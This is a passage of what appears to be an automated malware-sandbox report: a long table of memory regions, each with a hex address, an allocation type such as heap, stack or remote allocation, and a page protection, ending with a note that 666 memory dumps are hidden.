page read and write
|
||
64E0000
|
heap
|
page read and write
|
||
7FCE000
|
heap
|
page read and write
|
||
2C14000
|
heap
|
page read and write
|
||
6C10000
|
trusted library allocation
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
980000
|
heap
|
page read and write
|
||
2FBE000
|
stack
|
page read and write
|
||
DE0000
|
unkown
|
page read and write
|
||
8010000
|
heap
|
page read and write
|
||
2AF0000
|
heap
|
page read and write
|
||
71000
|
heap
|
page read and write
|
||
24DE000
|
stack
|
page read and write
|
||
91A000
|
stack
|
page read and write
|
||
7B80000
|
trusted library allocation
|
page execute and read and write
|
||
F6F000
|
unkown
|
page read and write
|
||
665E000
|
stack
|
page read and write
|
||
247E000
|
stack
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
A1A000
|
heap
|
page read and write
|
||
2ACF000
|
stack
|
page read and write
|
||
67E0000
|
direct allocation
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
67B0000
|
direct allocation
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
1290000
|
unkown
|
page readonly
|
||
F60000
|
unkown
|
page readonly
|
||
B58000
|
heap
|
page read and write
|
||
2AF0000
|
heap
|
page read and write
|
||
6FCD000
|
stack
|
page read and write
|
||
500000
|
heap
|
page read and write
|
||
222BC000
|
heap
|
page read and write
|
||
58A000
|
heap
|
page read and write
|
||
23D0000
|
heap
|
page read and write
|
||
222D000
|
remote allocation
|
page execute and read and write
|
||
21DED000
|
stack
|
page read and write
|
||
1098000
|
heap
|
page read and write
|
||
F97000
|
unkown
|
page readonly
|
||
7000000
|
trusted library allocation
|
page read and write
|
||
8120000
|
trusted library allocation
|
page read and write
|
||
F81000
|
unkown
|
page execute read
|
||
2EB7000
|
unkown
|
page read and write
|
||
3460000
|
heap
|
page read and write
|
||
D7E000
|
direct allocation
|
page execute and read and write
|
||
550000
|
heap
|
page read and write
|
||
1620000
|
unkown
|
page readonly
|
||
5499000
|
trusted library allocation
|
page read and write
|
||
26D0000
|
trusted library allocation
|
page read and write
|
||
F22000
|
direct allocation
|
page execute and read and write
|
||
29F0000
|
heap
|
page read and write
|
||
665B000
|
heap
|
page read and write
|
||
19A000
|
stack
|
page read and write
|
||
F95000
|
unkown
|
page read and write
|
||
5627000
|
trusted library allocation
|
page read and write
|
||
65D0000
|
direct allocation
|
page read and write
|
||
7C3000
|
unkown
|
page readonly
|
||
2C14000
|
heap
|
page read and write
|
||
2F5F000
|
stack
|
page read and write
|
||
65AE000
|
stack
|
page read and write
|
||
2E77000
|
heap
|
page read and write
|
||
4480000
|
heap
|
page execute and read and write
|
||
6D61000
|
heap
|
page read and write
|
||
B90000
|
heap
|
page read and write
|
||
2F12000
|
heap
|
page read and write
|
||
221D0000
|
direct allocation
|
page read and write
|
||
32A4000
|
unkown
|
page execute and read and write
|
||
26A4000
|
heap
|
page read and write
|
||
B80000
|
unkown
|
page readonly
|
||
21D2E000
|
stack
|
page read and write
|
||
2330000
|
heap
|
page read and write
|
||
227BD000
|
direct allocation
|
page execute and read and write
|
||
227C1000
|
direct allocation
|
page execute and read and write
|
||
21B8F000
|
stack
|
page read and write
|
||
2AD0000
|
unkown
|
page readonly
|
||
7A4000
|
unkown
|
page read and write
|
||
21C10000
|
heap
|
page read and write
|
||
5640000
|
trusted library allocation
|
page read and write
|
||
6C93000
|
heap
|
page read and write
|
||
6E80000
|
trusted library allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
298D000
|
stack
|
page read and write
|
||
7F0000
|
heap
|
page read and write
|
||
2246F000
|
heap
|
page read and write
|
||
3FF0000
|
trusted library allocation
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
278E000
|
heap
|
page read and write
|
||
9D5000
|
heap
|
page read and write
|
||
1138000
|
heap
|
page read and write
|
||
2F60000
|
trusted library allocation
|
page read and write
|
||
1080000
|
unkown
|
page read and write
|
||
54B9000
|
trusted library allocation
|
page read and write
|
||
F80000
|
unkown
|
page readonly
|
||
7F1C0000
|
trusted library allocation
|
page execute and read and write
|
||
66B8000
|
heap
|
page read and write
|
||
26F0000
|
heap
|
page read and write
|
||
2EF0000
|
heap
|
page read and write
|
||
9D0000
|
unkown
|
page read and write
|
||
626000
|
unkown
|
page execute read
|
||
2360000
|
direct allocation
|
page read and write
|
||
A84D000
|
direct allocation
|
page execute and read and write
|
||
2300000
|
direct allocation
|
page read and write
|
||
2800000
|
direct allocation
|
page read and write
|
||
EAD000
|
direct allocation
|
page execute and read and write
|
||
6694000
|
heap
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
6890000
|
heap
|
page read and write
|
||
B50000
|
unkown
|
page readonly
|
||
8B0000
|
unkown
|
page readonly
|
||
2F70000
|
heap
|
page read and write
|
||
E60000
|
heap
|
page read and write
|
||
2339000
|
heap
|
page read and write
|
||
BF1000
|
unkown
|
page readonly
|
||
871000
|
heap
|
page read and write
|
||
98000
|
stack
|
page read and write
|
||
CFC000
|
stack
|
page read and write
|
||
788000
|
unkown
|
page read and write
|
||
262F000
|
stack
|
page read and write
|
||
362D000
|
remote allocation
|
page execute and read and write
|
||
23F0000
|
trusted library section
|
page read and write
|
||
230000
|
heap
|
page read and write
|
||
21E8E000
|
stack
|
page read and write
|
||
9E5000
|
heap
|
page read and write
|
||
67F0000
|
direct allocation
|
page read and write
|
||
2E7D000
|
stack
|
page read and write
|
||
A2F000
|
heap
|
page read and write
|
||
6400000
|
heap
|
page read and write
|
||
F8E000
|
unkown
|
page readonly
|
||
6694000
|
heap
|
page read and write
|
||
26E0000
|
trusted library allocation
|
page read and write
|
||
1130000
|
heap
|
page read and write
|
||
2202F000
|
stack
|
page read and write
|
||
7B6000
|
unkown
|
page readonly
|
||
2D30000
|
heap
|
page read and write
|
||
23C0000
|
direct allocation
|
page read and write
|
||
2FC0000
|
heap
|
page read and write
|
||
2F1E000
|
stack
|
page read and write
|
||
7090000
|
trusted library allocation
|
page read and write
|
||
10AB000
|
heap
|
page read and write
|
||
7F20000
|
heap
|
page read and write
|
||
7070000
|
trusted library allocation
|
page read and write
|
||
3FD9000
|
trusted library allocation
|
page read and write
|
||
7FE6000
|
heap
|
page read and write
|
||
1230000
|
unkown
|
page readonly
|
||
E50000
|
unkown
|
page read and write
|
||
7C30000
|
trusted library allocation
|
page read and write
|
||
319C000
|
stack
|
page read and write
|
||
114F000
|
heap
|
page read and write
|
||
4BAF000
|
trusted library allocation
|
page read and write
|
||
2520000
|
heap
|
page read and write
|
||
2320000
|
trusted library section
|
page read and write
|
||
26A0000
|
heap
|
page read and write
|
||
66AF000
|
heap
|
page read and write
|
||
43A0000
|
heap
|
page read and write
|
||
22190000
|
direct allocation
|
page read and write
|
||
664A000
|
heap
|
page read and write
|
||
26ED000
|
trusted library allocation
|
page execute and read and write
|
||
3360000
|
heap
|
page read and write
|
||
402D000
|
remote allocation
|
page execute and read and write
|
||
6780000
|
direct allocation
|
page read and write
|
||
8880000
|
direct allocation
|
page execute and read and write
|
||
667A000
|
heap
|
page read and write
|
||
C9F000
|
stack
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
7B70000
|
heap
|
page read and write
|
||
9E1000
|
unkown
|
page readonly
|
||
7AA0000
|
trusted library allocation
|
page execute and read and write
|
||
2793000
|
heap
|
page read and write
|
||
6675000
|
heap
|
page read and write
|
||
4037000
|
heap
|
page read and write
|
||
10BD000
|
heap
|
page read and write
|
||
D0D000
|
direct allocation
|
page execute and read and write
|
||
4388000
|
trusted library allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
6C17000
|
trusted library allocation
|
page read and write
|
||
6740000
|
direct allocation
|
page read and write
|
||
2E8E000
|
heap
|
page read and write
|
||
7FD2000
|
heap
|
page read and write
|
||
E20000
|
unkown
|
page readonly
|
||
9CE000
|
unkown
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
66B1000
|
heap
|
page read and write
|
There are 666 hidden memdumps, click here to show them.